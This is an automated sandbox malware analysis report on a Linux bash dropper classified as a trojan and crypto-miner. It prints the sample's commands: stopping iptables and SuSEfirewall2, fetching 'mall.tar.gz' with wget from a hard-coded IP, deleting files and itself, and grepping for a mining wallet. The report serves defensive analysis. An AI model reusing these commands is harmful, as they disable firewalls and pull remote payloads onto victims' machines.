Analysis Report L1fyFAYhE5
Overview
General Information |
---|
Joe Sandbox Version: | 24.0.0 |
Analysis ID: | 678655 |
Start date: | 03.10.2018 |
Start time: | 10:48:00 |
Joe Sandbox Product: | Cloud |
Overall analysis duration: | 0h 4m 59s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | L1fyFAYhE5 |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171) |
Detection: | MAL |
Classification: | mal60.troj.evad.mine.lin@0/0@0/0 |
Detection |
---|
Strategy | Score | Range | Reporting | Detection | |
---|---|---|---|---|---|
Threshold | 60 | 0 - 100 | Report FP / FN |
Classification |
---|
Signature Overview |
---|
Click to jump to signature section
Bitcoin Miner: |
---|
Found strings related to Crypto-Mining | Show sources |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Networking: |
---|
Detected TCP or UDP traffic on non-standard ports | Show sources |
Source: | TCP traffic: |
Tries to stop the "iptables" service | Show sources |
Source: | Systemctl executable stopping iptables: | ||
Source: | Systemctl executable stopping iptables: |
Connects to IPs without corresponding DNS lookups | Show sources |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: |
Executes the "wget" command typically used for HTTP/S downloading | Show sources |
Source: | Wget executable: |
Urls found in memory or binary data | Show sources |
Source: | String found in binary or memory: |
System Summary: |
---|
Sample contains strings that are potentially command strings | Show sources |
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: | ||
Source: | Potential command found: |
Classification label | Show sources |
Source: | Classification label: |
Persistence and Installation Behavior: |
---|
Executes the "rm" command used to delete files or directories | Show sources |
Source: | Rm executable: | ||
Source: | Rm executable: | ||
Source: | Rm executable: | ||
Source: | Rm executable: |
Tries to stop the "iptables" service | Show sources |
Source: | Systemctl executable stopping iptables: | ||
Source: | Systemctl executable stopping iptables: |
Creates hidden files and/or directories | Show sources |
Source: | Directory: |
Enumerates processes within the "proc" file system | Show sources |
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: | ||
Source: | File opened: |
Executes the "grep" command used to find patterns in files or piped streams | Show sources |
Source: | Grep executable: | ||
Source: | Grep executable: |
Executes the "mkdir" command used to create folders | Show sources |
Source: | Mkdir executable: |
Executes the "ps" command used to list the status of processes | Show sources |
Source: | Ps executable: |
Executes the "systemctl" command used for controlling the systemd system and service manager | Show sources |
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: | ||
Source: | Systemctl executable: |
Executes the "wget" command typically used for HTTP/S downloading | Show sources |
Source: | Wget executable: |
Reads system information from the proc file system | Show sources |
Source: | Reads from proc file: | ||
Source: | Reads from proc file: |
Hooking and other Techniques for Hiding and Protection: |
---|
Sample deletes itself | Show sources |
Source: | File: |
Runtime Messages |
---|
Command: | bash "/tmp/L1fyFAYhE5" |
Exit Code: | |
Exit Code Info: | |
Killed: | True |
Standard Output: | |
Standard Error: | /tmp/L1fyFAYhE5: line 1: #!/bin/bash: No such file or directory /tmp/L1fyFAYhE5: line 2: /etc/init.d/iptables: No such file or directory Failed to stop iptables.service: Unit iptables.service not loaded. /tmp/L1fyFAYhE5: line 4: SuSEfirewall2: command not found /tmp/L1fyFAYhE5: line 5: reSuSEfirewall2: command not found --2018-10-03 12:49:11-- http://115.236.92.99:54321/mall.tar.gz |
Behavior Graph |
---|
Yara Overview |
---|
Antivirus Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Startup |
---|
|
Created / dropped Files |
---|
No created / dropped files found |
---|
Domains and IPs |
---|
Contacted Domains |
---|
No contacted domains info |
---|
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
115.236.92.99 | China | 4134 | CHINANET-BACKBONENo31Jin-rongStreetCN | true |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 5.528162830997711 |
TrID: |
|
File name: | L1fyFAYhE5 |
File size: | 2014 |
MD5: | 94bfedc1dd3a8e3760fca3229a573464 |
SHA1: | 483573dbbd40e0af67e18b67105cbd4af7d2e5f9 |
SHA256: | e094df700e7c3523fffcaafe55b26ec52dc0c123a5e2e0779904b42f9d8d0739 |
SHA512: | 70a6621079189ed11a61495aeeb84f63ad29f39689f312334efad7174b44e815fd232cb599e369bbd5f2050a47000f337a1f9236d45ed6a63139d6db9d713c4c |
File Content Preview: | ...#!/bin/bash./etc/init.d/iptables stop.service iptables stop.SuSEfirewall2 stop.reSuSEfirewall2 stop.rm -f /tmp/httpdlog/*.gz.rm -f *.gz.rm -f *.sh.rm -f $0.ret=`ps -ef|grep 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8Y |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Okt 3, 2018 10:49:13.030000925 MESZ | 44274 | 54321 | 192.168.1.100 | 115.236.92.99 |
Okt 3, 2018 10:49:14.026628017 MESZ | 44274 | 54321 | 192.168.1.100 | 115.236.92.99 |
Okt 3, 2018 10:49:16.030488968 MESZ | 44274 | 54321 | 192.168.1.100 | 115.236.92.99 |
Okt 3, 2018 10:49:20.038564920 MESZ | 44274 | 54321 | 192.168.1.100 | 115.236.92.99 |
Okt 3, 2018 10:49:28.054533958 MESZ | 44274 | 54321 | 192.168.1.100 | 115.236.92.99 |
Okt 3, 2018 10:49:44.070491076 MESZ | 44274 | 54321 | 192.168.1.100 | 115.236.92.99 |
Okt 3, 2018 10:50:16.134579897 MESZ | 44274 | 54321 | 192.168.1.100 | 115.236.92.99 |
Okt 3, 2018 10:52:23.213716030 MESZ | 60815 | 53 | 192.168.1.100 | 8.8.8.8 |
Okt 3, 2018 10:52:23.214348078 MESZ | 39029 | 53 | 192.168.1.100 | 8.8.8.8 |
Okt 3, 2018 10:52:23.226145029 MESZ | 53 | 60815 | 8.8.8.8 | 192.168.1.100 |
Okt 3, 2018 10:52:23.226608992 MESZ | 53 | 39029 | 8.8.8.8 | 192.168.1.100 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Okt 3, 2018 10:52:23.213716030 MESZ | 60815 | 53 | 192.168.1.100 | 8.8.8.8 |
Okt 3, 2018 10:52:23.214348078 MESZ | 39029 | 53 | 192.168.1.100 | 8.8.8.8 |
Okt 3, 2018 10:52:23.226145029 MESZ | 53 | 60815 | 8.8.8.8 | 192.168.1.100 |
Okt 3, 2018 10:52:23.226608992 MESZ | 53 | 39029 | 8.8.8.8 | 192.168.1.100 |
System Behavior |
---|
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | /bin/bash /tmp/L1fyFAYhE5 |
File size: | 1037528 bytes |
MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | n/a |
File size: | 1037528 bytes |
MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | n/a |
File size: | 1037528 bytes |
MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | n/a |
File size: | 1037528 bytes |
MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | /bin/sh /usr/sbin/service iptables stop |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /usr/bin/basename |
Arguments: | basename /usr/sbin/service |
File size: | 31408 bytes |
MD5 hash: | fd7bba8b11b99ec7559f30226c79a729 |
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /usr/bin/basename |
Arguments: | basename /usr/sbin/service |
File size: | 31408 bytes |
MD5 hash: | fd7bba8b11b99ec7559f30226c79a729 |
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl --quiet is-active multi-user.target |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl list-unit-files --full --type=socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:10 |
Start date: | 03/10/2018 |
Path: | /bin/sed |
Arguments: | sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p |
File size: | 73424 bytes |
MD5 hash: | c1a00c583ba08e728b10f3f46f5776d6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show acpid.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show apport-forward.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show avahi-daemon.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show cups.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show dbus.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show dm-event.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show lvm2-lvmetad.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show lvm2-lvmpolld.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show lxd.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show saned.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show snapd.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show ssh.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show syslog.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show systemd-bus-proxyd.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show systemd-fsckd.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show systemd-initctl.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show systemd-journald-audit.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show systemd-journald-dev-log.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show systemd-journald.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show systemd-networkd.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show systemd-rfkill.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show systemd-udevd-control.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show systemd-udevd-kernel.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /usr/sbin/service |
Arguments: | n/a |
File size: | 10057 bytes |
MD5 hash: | 81c4fe604ec67916db7b223725e5a9c6 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl -p Triggers show uuidd.socket |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/systemctl |
Arguments: | systemctl stop iptables.service |
File size: | 659848 bytes |
MD5 hash: | b08096235b8c90203e17721264b5ce40 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | n/a |
File size: | 1037528 bytes |
MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | n/a |
File size: | 1037528 bytes |
MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | n/a |
File size: | 1037528 bytes |
MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/rm |
Arguments: | rm -f /tmp/httpdlog/*.gz |
File size: | 60272 bytes |
MD5 hash: | b79876063d894c449856cca508ecca7f |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | n/a |
File size: | 1037528 bytes |
MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/rm |
Arguments: | rm -f *.gz |
File size: | 60272 bytes |
MD5 hash: | b79876063d894c449856cca508ecca7f |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | n/a |
File size: | 1037528 bytes |
MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/rm |
Arguments: | rm -f *.sh |
File size: | 60272 bytes |
MD5 hash: | b79876063d894c449856cca508ecca7f |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | n/a |
File size: | 1037528 bytes |
MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/rm |
Arguments: | rm -f /tmp/L1fyFAYhE5 |
File size: | 60272 bytes |
MD5 hash: | b79876063d894c449856cca508ecca7f |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | n/a |
File size: | 1037528 bytes |
MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | n/a |
File size: | 1037528 bytes |
MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/ps |
Arguments: | ps -ef |
File size: | 97408 bytes |
MD5 hash: | 37339e5441057d422e61e8a471505337 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | n/a |
File size: | 1037528 bytes |
MD5 hash: | 5e666695cf08d1638bb85684e30185ee |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/grep |
Arguments: | grep 45UmGzutvMrfwgtBdzNUMi4EwZXVmhQTVHnuM7Pom6VYL84o5bhVX1PZ4DZ3wrkYRYjcHRnRkeGv8YJ5oXWLWwik4V8Ji7Z |
File size: | 211224 bytes |
MD5 hash: | fc9b0a0ff848b35b3716768695bf2427 |
General |
---|
Start time: | 10:49:11 |
Start date: | 03/10/2018 |
Path: | /bin/bash |
Arguments: | n/a |
File size: | 1037528 bytes |
